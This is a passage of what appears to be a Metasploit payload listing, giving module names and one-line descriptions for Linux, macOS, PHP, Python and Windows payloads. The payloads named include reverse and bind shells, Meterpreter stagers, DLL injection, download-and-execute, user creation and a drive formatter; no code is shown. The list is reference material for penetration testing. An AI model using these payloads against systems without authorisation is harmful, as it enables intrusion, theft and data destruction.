   linux/mips64/meterpreter_reverse_tcp                                 normal  Linux Meterpreter, Reverse TCP Inline
   linux/mipsbe/exec                                                    normal  Linux Execute Command
   linux/mipsbe/meterpreter/reverse_tcp                                 normal  Linux Meterpreter, Reverse TCP Stager
   linux/mipsbe/meterpreter_reverse_http                                normal  Linux Meterpreter, Reverse HTTP Inline
   linux/mipsbe/meterpreter_reverse_https                               normal  Linux Meterpreter, Reverse HTTPS Inline
   linux/mipsbe/meterpreter_reverse_tcp                                 normal  Linux Meterpreter, Reverse TCP Inline
   linux/mipsbe/reboot                                                  normal  Linux Reboot
   linux/mipsbe/shell/reverse_tcp                                       normal  Linux Command Shell, Reverse TCP Stager
   linux/mipsbe/shell_bind_tcp                                          normal  Linux Command Shell, Bind TCP Inline
   linux/mipsbe/shell_reverse_tcp                                       normal  Linux Command Shell, Reverse TCP Inline
   linux/mipsle/exec                                                    normal  Linux Execute Command
   linux/mipsle/meterpreter/reverse_tcp                                 normal  Linux Meterpreter, Reverse TCP Stager
   linux/mipsle/meterpreter_reverse_http                                normal  Linux Meterpreter, Reverse HTTP Inline
   linux/mipsle/meterpreter_reverse_https                               normal  Linux Meterpreter, Reverse HTTPS Inline
   linux/mipsle/meterpreter_reverse_tcp                                 normal  Linux Meterpreter, Reverse TCP Inline
   linux/mipsle/reboot                                                  normal  Linux Reboot
   linux/mipsle/shell/reverse_tcp                                       normal  Linux Command Shell, Reverse TCP Stager
   linux/mipsle/shell_bind_tcp                                          normal  Linux Command Shell, Bind TCP Inline
   linux/mipsle/shell_reverse_tcp                                       normal  Linux Command Shell, Reverse TCP Inline
   linux/ppc/meterpreter_reverse_http                                   normal  Linux Meterpreter, Reverse HTTP Inline
   linux/ppc/meterpreter_reverse_https                                  normal  Linux Meterpreter, Reverse HTTPS Inline
   linux/ppc/meterpreter_reverse_tcp                                    normal  Linux Meterpreter, Reverse TCP Inline
   linux/ppc/shell_bind_tcp                                             normal  Linux Command Shell, Bind TCP Inline
   linux/ppc/shell_find_port                                            normal  Linux Command Shell, Find Port Inline
   linux/ppc/shell_reverse_tcp                                          normal  Linux Command Shell, Reverse TCP Inline
   linux/ppc64/shell_bind_tcp                                           normal  Linux Command Shell, Bind TCP Inline
   linux/ppc64/shell_find_port                                          normal  Linux Command Shell, Find Port Inline
   linux/ppc64/shell_reverse_tcp                                        normal  Linux Command Shell, Reverse TCP Inline
   linux/ppc64le/meterpreter_reverse_http                               normal  Linux Meterpreter, Reverse HTTP Inline
   linux/ppc64le/meterpreter_reverse_https                              normal  Linux Meterpreter, Reverse HTTPS Inline
   linux/ppc64le/meterpreter_reverse_tcp                                normal  Linux Meterpreter, Reverse TCP Inline
   linux/ppce500v2/meterpreter_reverse_http                             normal  Linux Meterpreter, Reverse HTTP Inline
   linux/ppce500v2/meterpreter_reverse_https                            normal  Linux Meterpreter, Reverse HTTPS Inline
   linux/ppce500v2/meterpreter_reverse_tcp                              normal  Linux Meterpreter, Reverse TCP Inline
   linux/x64/exec                                                       normal  Linux Execute Command
   linux/x64/meterpreter/bind_tcp                                       normal  Linux Mettle x64, Bind TCP Stager
   linux/x64/meterpreter/reverse_tcp                                    normal  Linux Mettle x64, Reverse TCP Stager
   linux/x64/meterpreter_reverse_http                                   normal  Linux Meterpreter, Reverse HTTP Inline
   linux/x64/meterpreter_reverse_https                                  normal  Linux Meterpreter, Reverse HTTPS Inline
   linux/x64/meterpreter_reverse_tcp                                    normal  Linux Meterpreter, Reverse TCP Inline
   linux/x64/shell/bind_tcp                                             normal  Linux Command Shell, Bind TCP Stager
   linux/x64/shell/reverse_tcp                                          normal  Linux Command Shell, Reverse TCP Stager
   linux/x64/shell_bind_tcp                                             normal  Linux Command Shell, Bind TCP Inline
   linux/x64/shell_bind_tcp_random_port                                 normal  Linux Command Shell, Bind TCP Random Port Inline
   linux/x64/shell_find_port                                            normal  Linux Command Shell, Find Port Inline
   linux/x64/shell_reverse_tcp                                          normal  Linux Command Shell, Reverse TCP Inline
   linux/x86/adduser                                                    normal  Linux Add User
   linux/x86/chmod                                                      normal  Linux Chmod
   linux/x86/exec                                                       normal  Linux Execute Command
   linux/x86/meterpreter/bind_ipv6_tcp                                  normal  Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   linux/x86/meterpreter/bind_ipv6_tcp_uuid                             normal  Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   linux/x86/meterpreter/bind_nonx_tcp                                  normal  Linux Mettle x86, Bind TCP Stager
   linux/x86/meterpreter/bind_tcp                                       normal  Linux Mettle x86, Bind TCP Stager (Linux x86)
   linux/x86/meterpreter/bind_tcp_uuid                                  normal  Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   linux/x86/meterpreter/find_tag                                       normal  Linux Mettle x86, Find Tag Stager
   linux/x86/meterpreter/reverse_ipv6_tcp                               normal  Linux Mettle x86, Reverse TCP Stager (IPv6)
   linux/x86/meterpreter/reverse_nonx_tcp                               normal  Linux Mettle x86, Reverse TCP Stager
   linux/x86/meterpreter/reverse_tcp                                    normal  Linux Mettle x86, Reverse TCP Stager
   linux/x86/meterpreter/reverse_tcp_uuid                               normal  Linux Mettle x86, Reverse TCP Stager
   linux/x86/meterpreter_reverse_http                                   normal  Linux Meterpreter, Reverse HTTP Inline
   linux/x86/meterpreter_reverse_https                                  normal  Linux Meterpreter, Reverse HTTPS Inline
   linux/x86/meterpreter_reverse_tcp                                    normal  Linux Meterpreter, Reverse TCP Inline
   linux/x86/metsvc_bind_tcp                                            normal  Linux Meterpreter Service, Bind TCP
   linux/x86/metsvc_reverse_tcp                                         normal  Linux Meterpreter Service, Reverse TCP Inline
   linux/x86/read_file                                                  normal  Linux Read File
   linux/x86/shell/bind_ipv6_tcp                                        normal  Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   linux/x86/shell/bind_ipv6_tcp_uuid                                   normal  Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   linux/x86/shell/bind_nonx_tcp                                        normal  Linux Command Shell, Bind TCP Stager
   linux/x86/shell/bind_tcp                                             normal  Linux Command Shell, Bind TCP Stager (Linux x86)
   linux/x86/shell/bind_tcp_uuid                                        normal  Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   linux/x86/shell/find_tag                                             normal  Linux Command Shell, Find Tag Stager
   linux/x86/shell/reverse_ipv6_tcp                                     normal  Linux Command Shell, Reverse TCP Stager (IPv6)
   linux/x86/shell/reverse_nonx_tcp                                     normal  Linux Command Shell, Reverse TCP Stager
   linux/x86/shell/reverse_tcp                                          normal  Linux Command Shell, Reverse TCP Stager
   linux/x86/shell/reverse_tcp_uuid                                     normal  Linux Command Shell, Reverse TCP Stager
   linux/x86/shell_bind_ipv6_tcp                                        normal  Linux Command Shell, Bind TCP Inline (IPv6)
   linux/x86/shell_bind_tcp                                             normal  Linux Command Shell, Bind TCP Inline
   linux/x86/shell_bind_tcp_random_port                                 normal  Linux Command Shell, Bind TCP Random Port Inline
   linux/x86/shell_find_port                                            normal  Linux Command Shell, Find Port Inline
   linux/x86/shell_find_tag                                             normal  Linux Command Shell, Find Tag Inline
   linux/x86/shell_reverse_tcp                                          normal  Linux Command Shell, Reverse TCP Inline
   linux/zarch/meterpreter_reverse_http                                 normal  Linux Meterpreter, Reverse HTTP Inline
   linux/zarch/meterpreter_reverse_https                                normal  Linux Meterpreter, Reverse HTTPS Inline
   linux/zarch/meterpreter_reverse_tcp                                  normal  Linux Meterpreter, Reverse TCP Inline
   mainframe/shell_reverse_tcp                                          normal  Z/OS (MVS) Command Shell, Reverse TCP Inline
   multi/meterpreter/reverse_http                                       normal  Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures)
   multi/meterpreter/reverse_https                                      normal  Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)
   netware/shell/reverse_tcp                                            normal  NetWare Command Shell, Reverse TCP Stager
   nodejs/shell_bind_tcp                                                normal  Command Shell, Bind TCP (via nodejs)
   nodejs/shell_reverse_tcp                                             normal  Command Shell, Reverse TCP (via nodejs)
   nodejs/shell_reverse_tcp_ssl                                         normal  Command Shell, Reverse TCP SSL (via nodejs)
   osx/armle/execute/bind_tcp                                           normal  OS X Write and Execute Binary, Bind TCP Stager
   osx/armle/execute/reverse_tcp                                        normal  OS X Write and Execute Binary, Reverse TCP Stager
   osx/armle/shell/bind_tcp                                             normal  OS X Command Shell, Bind TCP Stager
   osx/armle/shell/reverse_tcp                                          normal  OS X Command Shell, Reverse TCP Stager
   osx/armle/shell_bind_tcp                                             normal  Apple iOS Command Shell, Bind TCP Inline
   osx/armle/shell_reverse_tcp                                          normal  Apple iOS Command Shell, Reverse TCP Inline
   osx/armle/vibrate                                                    normal  Apple iOS iPhone Vibrate
   osx/ppc/shell/bind_tcp                                               normal  OS X Command Shell, Bind TCP Stager
   osx/ppc/shell/find_tag                                               normal  OS X Command Shell, Find Tag Stager
   osx/ppc/shell/reverse_tcp                                            normal  OS X Command Shell, Reverse TCP Stager
   osx/ppc/shell_bind_tcp                                               normal  OS X Command Shell, Bind TCP Inline
   osx/ppc/shell_reverse_tcp                                            normal  OS X Command Shell, Reverse TCP Inline
   osx/x64/dupandexecve/bind_tcp                                        normal  OS X dup2 Command Shell, Bind TCP Stager
   osx/x64/dupandexecve/reverse_tcp                                     normal  OS X dup2 Command Shell, Reverse TCP Stager
   osx/x64/exec                                                         normal  OS X x64 Execute Command
   osx/x64/meterpreter_reverse_http                                     normal  OSX Meterpreter, Reverse HTTP Inline
   osx/x64/meterpreter_reverse_https                                    normal  OSX Meterpreter, Reverse HTTPS Inline
   osx/x64/meterpreter_reverse_tcp                                      normal  OSX Meterpreter, Reverse TCP Inline
   osx/x64/say                                                          normal  OS X x64 say Shellcode
   osx/x64/shell_bind_tcp                                               normal  OS X x64 Shell Bind TCP
   osx/x64/shell_find_tag                                               normal  OSX Command Shell, Find Tag Inline
   osx/x64/shell_reverse_tcp                                            normal  OS X x64 Shell Reverse TCP
   osx/x86/bundleinject/bind_tcp                                        normal  Mac OS X Inject Mach-O Bundle, Bind TCP Stager
   osx/x86/bundleinject/reverse_tcp                                     normal  Mac OS X Inject Mach-O Bundle, Reverse TCP Stager
   osx/x86/exec                                                         normal  OS X Execute Command
   osx/x86/isight/bind_tcp                                              normal  Mac OS X x86 iSight Photo Capture, Bind TCP Stager
   osx/x86/isight/reverse_tcp                                           normal  Mac OS X x86 iSight Photo Capture, Reverse TCP Stager
   osx/x86/shell_bind_tcp                                               normal  OS X Command Shell, Bind TCP Inline
   osx/x86/shell_find_port                                              normal  OS X Command Shell, Find Port Inline
   osx/x86/shell_reverse_tcp                                            normal  OS X Command Shell, Reverse TCP Inline
   osx/x86/vforkshell/bind_tcp                                          normal  OS X (vfork) Command Shell, Bind TCP Stager
   osx/x86/vforkshell/reverse_tcp                                       normal  OS X (vfork) Command Shell, Reverse TCP Stager
   osx/x86/vforkshell_bind_tcp                                          normal  OS X (vfork) Command Shell, Bind TCP Inline
   osx/x86/vforkshell_reverse_tcp                                       normal  OS X (vfork) Command Shell, Reverse TCP Inline
   php/bind_perl                                                        normal  PHP Command Shell, Bind TCP (via Perl)
   php/bind_perl_ipv6                                                   normal  PHP Command Shell, Bind TCP (via perl) IPv6
   php/bind_php                                                         normal  PHP Command Shell, Bind TCP (via PHP)
   php/bind_php_ipv6                                                    normal  PHP Command Shell, Bind TCP (via php) IPv6
   php/download_exec                                                    normal  PHP Executable Download and Execute
   php/exec                                                             normal  PHP Execute Command
   php/meterpreter/bind_tcp                                             normal  PHP Meterpreter, Bind TCP Stager
   php/meterpreter/bind_tcp_ipv6                                        normal  PHP Meterpreter, Bind TCP Stager IPv6
   php/meterpreter/bind_tcp_ipv6_uuid                                   normal  PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   php/meterpreter/bind_tcp_uuid                                        normal  PHP Meterpreter, Bind TCP Stager with UUID Support
   php/meterpreter/reverse_tcp                                          normal  PHP Meterpreter, PHP Reverse TCP Stager
   php/meterpreter/reverse_tcp_uuid                                     normal  PHP Meterpreter, PHP Reverse TCP Stager
   php/meterpreter_reverse_tcp                                          normal  PHP Meterpreter, Reverse TCP Inline
   php/reverse_perl                                                     normal  PHP Command, Double Reverse TCP Connection (via Perl)
   php/reverse_php                                                      normal  PHP Command Shell, Reverse TCP (via PHP)
   php/shell_findsock                                                   normal  PHP Command Shell, Find Sock
   python/meterpreter/bind_tcp                                          normal  Python Meterpreter, Python Bind TCP Stager
   python/meterpreter/bind_tcp_uuid                                     normal  Python Meterpreter, Python Bind TCP Stager with UUID Support
   python/meterpreter/reverse_http                                      normal  Python Meterpreter, Python Reverse HTTP Stager
   python/meterpreter/reverse_https                                     normal  Python Meterpreter, Python Reverse HTTPS Stager
   python/meterpreter/reverse_tcp                                       normal  Python Meterpreter, Python Reverse TCP Stager
   python/meterpreter/reverse_tcp_ssl                                   normal  Python Meterpreter, Python Reverse TCP SSL Stager
   python/meterpreter/reverse_tcp_uuid                                  normal  Python Meterpreter, Python Reverse TCP Stager with UUID Support
   python/meterpreter_bind_tcp                                          normal  Python Meterpreter Shell, Bind TCP Inline
   python/meterpreter_reverse_http                                      normal  Python Meterpreter Shell, Reverse HTTP Inline
   python/meterpreter_reverse_https                                     normal  Python Meterpreter Shell, Reverse HTTPS Inline
   python/meterpreter_reverse_tcp                                       normal  Python Meterpreter Shell, Reverse TCP Inline
   python/shell_bind_tcp                                                normal  Command Shell, Bind TCP (via python)
   python/shell_reverse_tcp                                             normal  Command Shell, Reverse TCP (via python)
   python/shell_reverse_tcp_ssl                                         normal  Command Shell, Reverse TCP SSL (via python)
   r/shell_bind_tcp                                                     normal  R Command Shell, Bind TCP
   r/shell_reverse_tcp                                                  normal  R Command Shell, Reverse TCP
   ruby/shell_bind_tcp                                                  normal  Ruby Command Shell, Bind TCP
   ruby/shell_bind_tcp_ipv6                                             normal  Ruby Command Shell, Bind TCP IPv6
   ruby/shell_reverse_tcp                                               normal  Ruby Command Shell, Reverse TCP
   ruby/shell_reverse_tcp_ssl                                           normal  Ruby Command Shell, Reverse TCP SSL
   solaris/sparc/shell_bind_tcp                                         normal  Solaris Command Shell, Bind TCP Inline
   solaris/sparc/shell_find_port                                        normal  Solaris Command Shell, Find Port Inline
   solaris/sparc/shell_reverse_tcp                                      normal  Solaris Command Shell, Reverse TCP Inline
   solaris/x86/shell_bind_tcp                                           normal  Solaris Command Shell, Bind TCP Inline
   solaris/x86/shell_find_port                                          normal  Solaris Command Shell, Find Port Inline
   solaris/x86/shell_reverse_tcp                                        normal  Solaris Command Shell, Reverse TCP Inline
   tty/unix/interact                                                    normal  Unix TTY, Interact with Established Connection
   windows/adduser                                                      normal  Windows Execute net user /ADD
   windows/dllinject/bind_hidden_ipknock_tcp                            normal  Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
   windows/dllinject/bind_hidden_tcp                                    normal  Reflective DLL Injection, Hidden Bind TCP Stager
   windows/dllinject/bind_ipv6_tcp                                      normal  Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
   windows/dllinject/bind_ipv6_tcp_uuid                                 normal  Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/dllinject/bind_nonx_tcp                                      normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                           normal  Reflective DLL Injection, Bind TCP Stager (Windows x86)
   windows/dllinject/bind_tcp_rc4                                       normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/dllinject/bind_tcp_uuid                                      normal  Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
   windows/dllinject/find_tag                                           normal  Reflective DLL Injection, Find Tag Ordinal Stager
   windows/dllinject/reverse_hop_http                                   normal  Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
   windows/dllinject/reverse_http                                       normal  Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
   windows/dllinject/reverse_http_proxy_pstore                          normal  Reflective DLL Injection, Reverse HTTP Stager Proxy
   windows/dllinject/reverse_ipv6_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                    normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                        normal  Reflective DLL Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                               normal  Reflective DLL Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                    normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
   windows/dllinject/reverse_tcp_rc4                                    normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/dllinject/reverse_tcp_rc4_dns                                normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   windows/dllinject/reverse_tcp_uuid                                   normal  Reflective DLL Injection, Reverse TCP Stager with UUID Support
   windows/dllinject/reverse_winhttp                                    normal  Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
   windows/dns_txt_query_exec                                           normal  DNS TXT Record Payload Download and Execution
   windows/download_exec                                                normal  Windows Executable Download (http,https,ftp) and Execute
   windows/exec                                                         normal  Windows Execute Command
   windows/format_all_drives                                            manual  Windows Drive Formatter
   windows/loadlibrary                                                  normal  Windows LoadLibrary Path
   windows/messagebox                                                   normal  Windows MessageBox
   windows/meterpreter/bind_hidden_ipknock_tcp                          normal  Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   windows/meterpreter/bind_hidden_tcp                                  normal  Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   windows/meterpreter/bind_ipv6_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   windows/meterpreter/bind_ipv6_tcp_uuid                               normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/meterpreter/bind_nonx_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp                                         normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
   windows/meterpreter/bind_tcp_rc4                                     normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/meterpreter/bind_tcp_uuid                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   windows/meterpreter/find_tag                                         normal  Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
   windows/meterpreter/reverse_hop_http                                 normal  Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   windows/meterpreter/reverse_http                                     normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   windows/meterpreter/reverse_http_proxy_pstore                        normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
   windows/meterpreter/reverse_https                                    normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
   windows/meterpreter/reverse_https_proxy                              normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   windows/meterpreter/reverse_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_named_pipe                               normal  Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
   windows/meterpreter/reverse_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp                                  normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp                                      normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/meterpreter/reverse_tcp_rc4                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/meterpreter/reverse_tcp_rc4_dns                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   windows/meterpreter/reverse_tcp_uuid                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
   windows/meterpreter/reverse_winhttp                                  normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
   windows/meterpreter/reverse_winhttps                                 normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
   windows/meterpreter_bind_tcp                                         normal  Windows Meterpreter Shell, Bind TCP Inline
   windows/meterpreter_reverse_http                                     normal  Windows Meterpreter Shell, Reverse HTTP Inline
   windows/meterpreter_reverse_https                                    normal  Windows Meterpreter Shell, Reverse HTTPS Inline
   windows/meterpreter_reverse_ipv6_tcp                                 normal  Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
   windows/meterpreter_reverse_tcp                                      normal  Windows Meterpreter Shell, Reverse TCP Inline
   windows/metsvc_bind_tcp                                              normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                                           normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_hidden_ipknock_tcp                     normal  Windows Inject DLL, Hidden Bind Ipknock TCP Stager
   windows/patchupdllinject/bind_hidden_tcp                             normal  Windows Inject DLL, Hidden Bind TCP Stager
   windows/patchupdllinject/bind_ipv6_tcp                               normal  Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
   windows/patchupdllinject/bind_ipv6_tcp_uuid                          normal  Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/patchupdllinject/bind_nonx_tcp                               normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp                                    normal  Windows Inject DLL, Bind TCP Stager (Windows x86)
   windows/patchupdllinject/bind_tcp_rc4                                normal  Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/patchupdllinject/bind_tcp_uuid                               normal  Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
   windows/patchupdllinject/find_tag                                    normal  Windows Inject DLL, Find Tag Ordinal Stager
   windows/patchupdllinject/reverse_ipv6_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp                             normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp                                 normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports                        normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns                             normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupdllinject/reverse_tcp_rc4                             normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/patchupdllinject/reverse_tcp_rc4_dns                         normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   windows/patchupdllinject/reverse_tcp_uuid                            normal  Windows Inject DLL, Reverse TCP Stager with UUID Support
   windows/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   windows/patchupmeterpreter/bind_hidden_tcp                           normal  Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   windows/patchupmeterpreter/bind_ipv6_tcp                             normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
   windows/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/patchupmeterpreter/bind_nonx_tcp                             normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp                                  normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
   windows/patchupmeterpreter/bind_tcp_rc4                              normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/patchupmeterpreter/bind_tcp_uuid                             normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
   windows/patchupmeterpreter/find_tag                                  normal  Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager
   windows/patchupmeterpreter/reverse_ipv6_tcp                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp                           normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp                               normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports                      normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns                           normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/reverse_tcp_rc4                           normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/patchupmeterpreter/reverse_tcp_rc4_dns                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   windows/patchupmeterpreter/reverse_tcp_uuid                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
   windows/powershell_bind_tcp                                          normal  Windows Interactive Powershell Session, Bind TCP
   windows/powershell_reverse_tcp                                       normal  Windows Interactive Powershell Session, Reverse TCP
   windows/shell/bind_hidden_ipknock_tcp                                normal  Windows Command Shell, Hidden Bind Ipknock TCP Stager
   windows/shell/bind_hidden_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Stager
   windows/shell/bind_ipv6_tcp                                          normal  Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
   windows/shell/bind_ipv6_tcp_uuid                                     normal  Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/shell/bind_nonx_tcp                                          normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp                                               normal  Windows Command Shell, Bind TCP Stager (Windows x86)
   windows/shell/bind_tcp_rc4                                           normal  Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/shell/bind_tcp_uuid                                          normal  Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
   windows/shell/find_tag                                               normal  Windows Command Shell, Find Tag Ordinal Stager
   windows/shell/reverse_ipv6_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                                        normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                                   normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                        normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell/reverse_tcp_rc4                                        normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/shell/reverse_tcp_rc4_dns                                    normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   windows/shell/reverse_tcp_uuid                                       normal  Windows Command Shell, Reverse TCP Stager with UUID Support
   windows/shell_bind_tcp                                               normal  Windows Command Shell, Bind TCP Inline
   windows/shell_bind_tcp_xpfw                                          normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   windows/shell_hidden_bind_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Inline
   windows/shell_reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Inline
   windows/speak_pwned                                                  normal  Windows Speech API - Say "You Got Pwned!"
   windows/upexec/bind_hidden_ipknock_tcp                               normal  Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
   windows/upexec/bind_hidden_tcp                                       normal  Windows Upload/Execute, Hidden Bind TCP Stager
   windows/upexec/bind_ipv6_tcp                                         normal  Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
   windows/upexec/bind_ipv6_tcp_uuid                                    normal  Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/upexec/bind_nonx_tcp                                         normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp                                              normal  Windows Upload/Execute, Bind TCP Stager (Windows x86)
   windows/upexec/bind_tcp_rc4                                          normal  Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/upexec/bind_tcp_uuid                                         normal  Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
   windows/upexec/find_tag                                              normal  Windows Upload/Execute, Find Tag Ordinal Stager
   windows/upexec/reverse_ipv6_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
